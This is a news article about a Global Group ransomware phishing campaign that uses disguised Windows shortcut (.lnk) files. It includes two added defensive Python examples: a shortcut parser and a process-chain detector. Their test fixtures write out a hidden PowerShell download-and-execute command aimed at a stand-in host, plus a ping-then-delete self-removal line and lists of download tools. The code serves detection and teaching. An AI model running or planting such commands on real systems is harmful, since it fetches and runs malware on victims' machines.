Global Group ransomware gang running new campaign using Windows shortcut files
When Microsoft patched a vulnerability last summer that allowed threat actors to use Windows’ shortcut (.lnk) files in exploits, defenders might have hoped use of this tactic would decline.
They were wrong.
According to researchers at Forcepoint, a new high-volume phishing campaign spreading the Global Group ransomware has been detected that hopes to sucker employees into clicking on an attachment in an email with the subject line ‘Your document.’
The trigger is a weaponized .lnk file.
“By combining social engineering, stealthy execution, and Living-off-the-Land (LotL) techniques, the file silently retrieves and launches a second stage payload without raising suspicion,” says report author Lydia McElligott, noting that the ‘Your document’ subject line has been heavily used in large scale phishing campaigns throughout 2024 and 2025.
The warning about this campaign follows an IBM detection last month of a similar campaign distributing the Aware ransomware strain, a variant of the Global Group strain used in this attack.
In both cases, the threat actors behind the campaigns were leveraging the Phorpiex botnet, sometimes called Trik by researchers.
Worries about a .lnk vulnerability go back to March 2025, when Trend Micro reported thousands of malicious .lnk files containing hidden command line arguments (padded with whitespace so that the shortcut’s Properties dialog did not display them) being used in campaigns dating back to 2017. Mitja Kolsek of 0Patch reported that this particular hole (CVE-2025-9491) was quietly plugged last summer.
However, McElligott doesn’t believe this vulnerability is being used in the latest Global Group campaign, because the shortcut’s target and arguments aren’t hidden from the .lnk file’s Properties dialog.
Who is Global Group?
Global Group is a ransomware as a service (RaaS) operation that emerged in June 2025. Many researchers believe it’s a rebranding of the BlackLock and Mamona operations. Within its first month, it claimed approximately 17 victims across multiple industries and geographic regions. According to researchers at EclecticIQ, as of July 2025, Global Group operated a dedicated leak site on the Tor network. The real IP address of the site went to a Russia-based virtual private server (VPS) provider previously used by Mamona RaaS gang.
McElligott said in an email that, while notable as a newcomer with rapid growth, it wasn’t especially prolific compared to top-tier ransomware operations during the same period.
Why LNK files?
A .lnk file is a Windows shortcut that points to a file, folder, or application. It uses the Shell Link binary file format (MS-SHLLINK), which stores the target, any command line arguments, the working directory, and the icon to display for the shortcut.
Windows shortcut files are still one of the simplest ways to turn a single click into code execution, Forcepoint’s McElligott wrote in her blog. In inboxes, a .lnk can be disguised as a normal document by using double extensions (for example, Document.doc.lnk) and relying on Windows default settings that hide known file extensions. To most users, she wrote, the filename reads like a Word document, not a shortcut that can launch commands.
According to McAfee, when Microsoft disabled Office macros from running by default, threat actors increasingly turned to finding ways to exploit .lnk files, and in a June 2025 report, researchers at Palo Alto Networks also noted that the flexibility of .lnk files “makes them a powerful tool for attackers, as they can both execute malicious content and masquerade as legitimate files to deceive victims into unintentionally launching malware.”
Attackers also lean on familiar visual cues. By borrowing icons from legitimate Windows resources like shell32.dll, the attachment can look like a trusted file type at a glance. That mix of “a document-looking name” plus a recognizable icon reduces user hesitation about clicking, especially useful in high volume phishing where the goal is speed and scale.
Once clicked, McElligott wrote, a shortcut can execute cmd.exe or PowerShell directly, pass arguments quietly, and chain actions without dropping an obvious installer. That low-friction path is why .lnk lures keep showing up in commodity campaigns: they are easy to generate, easy to theme, and they reliably bridge the gap between a phishing email and a payload download.
The phishing messages Forcepoint has seen should easily be deemed suspicious. The message simply reads, “Hello, you can find your document in the attachment. Please reply as soon as possible. Kind regards, GSD Support.” Unlike more sophisticated phishing messages, there isn’t a fake lure (“This is in response to your message”) or pressure for a response (“Urgent” or “Please look at this and reply by end of day”).
The attachment in the sample email appeared as ‘Document.zip’, but the file was really named ‘Document.doc.lnk’; the double extension hides the .lnk suffix behind a document-looking one. Clicking on the file launches cmd.exe with embedded arguments that invoke PowerShell to download the ransomware, write it to disk as a binary masquerading as a legitimate Windows executable (windrv.exe, for example), and execute it.
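To make the masquerade concrete, here is an added example (my code, not Forcepoint’s or the campaign’s tooling) that parses a shortcut using the MS-SHLLINK header and StringData layout and flags the tricks described above: the double extension, a cmd.exe target, download cmdlets in the arguments, a minimized console window, an icon borrowed from shell32.dll, and, as a caveat, the whitespace-padded arguments of the earlier CVE-2025-9491 lures, which this campaign reportedly does not use. The sample .lnk bytes are constructed in memory; the hostname example.invalid, the relative target path and the window setting are assumptions for the example, not artifacts from the campaign.

```python
# Added example (not Forcepoint's tooling): parse a .lnk with MS-SHLLINK offsets and
# flag the masquerade tricks described in the article. Fixtures are built in memory;
# example.invalid is a reserved hostname. Nothing is written to disk or executed.
import re
import struct

HEADER_SIZE = 0x4C  # ShellLinkHeader size; LinkCLSID 00021401-0000-0000-C000-000000000046
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand: window opens minimized and unfocused
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),  # on-disk order
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
DOC_EXTS = {"doc", "docx", "pdf", "xls", "xlsx", "rtf", "txt"}
DOWNLOAD = re.compile(r"\b(iwr|invoke-webrequest|downloadfile|downloadstring|net\.webclient|"
                      r"bitsadmin|curl|certutil)\b", re.I)


def _string_data(s):
    """StringData item: CountCharacters (UInt16) followed by UTF-16LE text, no terminator."""
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(relative_path, arguments="", icon_location="", show_command=1):
    """Minimal Shell Link: header + StringData + TerminalBlock (test fixture only)."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH
    flags |= HAS_ARGUMENTS if arguments else 0
    flags |= HAS_ICON_LOCATION if icon_location else 0
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = _string_data(relative_path)
    body += _string_data(arguments) if arguments else b""
    body += _string_data(icon_location) if icon_location else b""
    return header + body + struct.pack("<I", 0)


def parse_lnk(data):
    """Return LinkFlags, ShowCommand and the StringData strings of a .lnk."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_IDLIST:  # skip IDListSize (UInt16) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            info[name] = None
            continue
        size = struct.unpack_from("<H", data, pos)[0] * (2 if unicode else 1)
        raw = data[pos + 2:pos + 2 + size]
        pos += 2 + size
        info[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", "replace")
    return info


def triage(filename, data):
    """Return 'code: detail' findings for a shortcut attachment."""
    info = parse_lnk(data)
    findings = []
    parts = filename.lower().split(".")
    if len(parts) >= 3 and parts[-1] == "lnk" and parts[-2] in DOC_EXTS:
        findings.append(f"double-extension: displays as '{filename[:-4]}' with extensions hidden")
    target = (info["relative_path"] or "").replace("/", "\\").split("\\")[-1].lower()
    if target in SCRIPT_HOSTS:
        findings.append(f"script-host-target: {info['relative_path']}")
    args = info["arguments"] or ""
    if DOWNLOAD.search(args):
        findings.append("download-in-args: arguments fetch a second stage")
    pad = len(args) - len(args.lstrip(" \t\r\n\x0b\x0c"))
    if pad >= 32:  # the whitespace-padding trick Trend Micro reported (CVE-2025-9491)
        findings.append(f"padded-arguments: {pad} leading whitespace chars hide the command in Properties")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("minimized-window: ShowCommand=7")
    icon = (info["icon_location"] or "").lower()
    if icon.endswith(".dll") and ("shell32" in icon or "imageres" in icon):
        findings.append(f"system-dll-icon: {info['icon_location']}")
    return findings


# Constructed fixtures: a campaign-style lure and a harmless document shortcut
LURE_NAME = "Document.doc.lnk"
LURE = build_lnk(r"..\..\..\Windows\System32\cmd.exe",
                 r'/c powershell -w hidden -ep bypass -c "iwr http://example.invalid/x '
                 r'-o $env:TEMP\windrv.exe; & $env:TEMP\windrv.exe"',
                 r"%SystemRoot%\System32\shell32.dll", show_command=SW_SHOWMINNOACTIVE)
BENIGN = build_lnk(r"..\Documents\report.docx")

if __name__ == "__main__":
    for name, blob in ((LURE_NAME, LURE), ("report.lnk", BENIGN)):
        print(name, "->", parse_lnk(blob)["relative_path"], triage(name, blob))
```

Run against real attachments, the parser also has to walk the LinkTargetIDList and LinkInfo blocks it skips here; the point is that the target, arguments and icon are plain StringData fields and can be inspected at the mail gateway before a user ever sees the document-looking icon.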
Uncommon tactic
Interestingly, the Global Group ransomware operates in a fully mute mode – that is, instead of communicating through a command and control server, it performs all activity locally on the compromised system. “This tactic is very uncommon,” McElligott said in an email. “Typically, modern ransomware relies on network communication to enable encryption, data exfiltration, double extortion tactics, leak sites, and negotiation infrastructure. Stolen data is used to increase pressure on victims to pay the ransom demands.”
The ransomware doesn’t retrieve an external encryption key; instead, it generates the key on the host machine itself. As a result, despite the claims made in its ransom note, data isn’t exfiltrated.
Exfiltrating data can slow attacks and leave more forensic artifacts, McElligott explained. By focusing on encryption only, ransomware attacks can be deployed faster, hit more victims, and be less likely to be detected. In many cases, she added, data exfiltration isn’t necessary to force payment, as encryption alone can cause significant downtime.
Because Global Group ransomware can operate entirely offline, she said, it is less likely to trigger detection based on network traffic. In fact, the ransomware can execute in air-gapped environments.
“This offline‑only design also increases its likelihood of evading detection in networks where monitoring efforts rely primarily on observing suspicious or anomalous traffic,” said McElligott.
To frustrate detection, the ransomware uses a ping command as a simple timer (in batch scripting, a ping with a fixed packet count is a common stand-in for a sleep), giving the malware time to finish executing and terminate cleanly from memory before removing itself from disk to impede forensic analysis.
The malware also includes anti-virtualization and anti-analysis checks: it enumerates running processes on the host and looks for processes associated with the virtualized environments used for malware analysis and sandboxing, as well as for common analysis tools. It also identifies database-related processes and terminates them to release file locks, increasing the volume of data available for encryption.
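The process chain described above (explorer.exe launching the shortcut’s cmd.exe, PowerShell fetching windrv.exe into a temp directory and running it, then a ping-as-timer followed by a delete) is what behavioural EDR should catch. As an added example (not Forcepoint’s or any vendor’s detection content), the following Python walks a constructed, Sysmon-style process-creation log and scores each stage; the PIDs, user name, paths and the host example.invalid are invented, and the ping-and-del command line is an assumed form of the timer the article describes.

```python
# Added example (not Forcepoint's or any vendor's detection content): walk
# process-creation telemetry for the .lnk-to-ransomware chain. EVENTS is a
# constructed, Sysmon-like log; PIDs, paths and example.invalid are invented.
import re

EVENTS = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # the shortcut's target: cmd.exe launched by the shell with the .lnk's arguments
    {"pid": 4120, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c powershell -w hidden -ep bypass -c "iwr http://example.invalid/x '
                r'-o $env:TEMP\windrv.exe; & $env:TEMP\windrv.exe"'},
    {"pid": 4132, "ppid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -ep bypass -c "iwr http://example.invalid/x '
                r'-o $env:TEMP\windrv.exe; & $env:TEMP\windrv.exe"'},
    {"pid": 4150, "ppid": 4132, "image": r"C:\Users\alice\AppData\Local\Temp\windrv.exe",
     "cmdline": r"C:\Users\alice\AppData\Local\Temp\windrv.exe"},
    # ping used as a timer, then deletion of the dropped binary (assumed form)
    {"pid": 4170, "ppid": 4150, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c ping 127.0.0.1 -n 5 > nul & del /f /q "C:\Users\alice\AppData\Local\Temp\windrv.exe"'},
    # benign look-alikes that must not fire
    {"pid": 5000, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c ping -n 4 fileserver01"},
    {"pid": 5010, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Process"},
]

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD = re.compile(r"\b(iwr|invoke-webrequest|downloadfile|downloadstring|net\.webclient|"
                      r"bitsadmin|curl|certutil)\b", re.I)
USER_WRITABLE = re.compile(r"\$env:temp|%temp%|%appdata%|\\appdata\\|\\temp\\|\\programdata\\|"
                           r"\\users\\public\\", re.I)
PING_SLEEP = re.compile(r"\bping\b[^&|]*\b(127\.0\.0\.1|localhost)\b[^&|]*\s-n\s+\d+"
                        r"|\bping\b\s+-n\s+\d+\s+(127\.0\.0\.1|localhost)\b", re.I)
DELETE = re.compile(r"\b(del|erase)\b", re.I)
STAGES = ("download-to-user-path", "script-host-spawned-user-path-binary", "ping-sleep-then-delete")


def basename(path):
    return path.replace("/", "\\").split("\\")[-1].lower()


def ancestry(events, pid):
    """PIDs from pid up to the root, following ppid links (cycle-safe)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(pid)
        pid = by_pid[pid]["ppid"]
    return chain


def lineage(events, pid):
    """Image basenames from the process up to the root."""
    by_pid = {e["pid"]: e for e in events}
    return [basename(by_pid[p]["image"]) for p in ancestry(events, pid)]


def analyze(events):
    """Map pid -> rule names for the chain's three observable stages."""
    by_pid = {e["pid"]: e for e in events}
    hits = {}
    for e in events:
        img, cmd = basename(e["image"]), e["cmdline"]
        parent = by_pid.get(e["ppid"])
        pimg = basename(parent["image"]) if parent else ""
        rules = []
        # stage 1: a script host fetching content into a user-writable path
        if img in SCRIPT_HOSTS and DOWNLOAD.search(cmd) and USER_WRITABLE.search(cmd):
            rules.append(STAGES[0])
        # stage 2: a non-script binary run from a user-writable path by a script host
        if (img.endswith(".exe") and img not in SCRIPT_HOSTS and pimg in SCRIPT_HOSTS
                and USER_WRITABLE.search(e["image"])):
            rules.append(STAGES[1])
        # stage 3: loopback ping as a timer, then del after the '&' in the same command line
        after_ping = cmd.split("&", 1)[1] if "&" in cmd else ""
        if PING_SLEEP.search(cmd) and DELETE.search(after_ping):
            rules.append(STAGES[2])
        if rules:
            hits[e["pid"]] = rules
    return hits


def full_chains(events, hits):
    """PIDs whose ancestry covers all three stages: the high-confidence alert."""
    return [pid for pid in hits
            if {r for p in ancestry(events, pid) for r in hits.get(p, [])} >= set(STAGES)]


if __name__ == "__main__":
    hits = analyze(EVENTS)
    for pid, rules in hits.items():
        print(pid, rules, " <- ".join(lineage(EVENTS, pid)))
    print("full chain:", full_chains(EVENTS, hits))
```

Each stage on its own is noisy (administrators do download with PowerShell and do use ping as a pause); the full-chain check only fires when one process ancestry covers all three stages, which is the alert worth paging on. Because this sample never talks to a command and control server, process lineage like this, not network telemetry, is the signal to rely on.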
Mitigation techniques
Security pros should adopt a layered approach to address the threat of all ransomware attacks, combining prevention, detection, rapid recovery, and user awareness to reduce the likelihood of being victimized, McElligott said.
To blunt an attack by Global Group she recommends that IT:
- impose strong email security to detect the phishing email;
- restrict access to built-in tools like PowerShell, WMI and other LOLBins, and restrict script execution, macros, and unsigned binaries;
- rely on behavioural endpoint detection and response (EDR) to detect suspicious process chains;
- segment IT networks to limit lateral movement;
- enforce least‑privilege access while rotating credentials and monitoring for anomalous authentication;
- maintain isolated, immutable backups for rapid recovery if files are encrypted.
Security awareness training is key
In addition, security awareness training instructing employees not to click on what should be seen as suspicious attachments is a first line of defense. Too many organizations do security awareness training and phishing tests just to check a compliance box rather than as a key part of a security culture-based approach, warned David Shipley, head of Canada-based awareness training provider Beauceron Security.
Compliance programs just want to show that an activity has been performed, he told Computerworld. A firm with a security culture should show not only that phishing risk has been reduced (click rate lowered) and the rate of reporting suspicious activity increased, but also that resiliency has improved. This is done by measuring how many people clicked a link and, of that group, how many then reported it. It’s known as the post-click report rate (PCRR).
“It’s a fantastic measure of both willingness to admit a mistake and psychological safety,” Shipley said.
He added that security pros should note that Microsoft’s latest Digital Defense report says AI-powered phishing is 4.5 times more effective than previous phishing efforts, with a 54% click through rate, compared to the previous average click through rate of 12%.
Research shows the right education, delivered quarterly alongside difficult phishing simulations that reward positive behaviors like reporting suspicious emails, is needed if an organization wants to reduce click rates, Shipley said.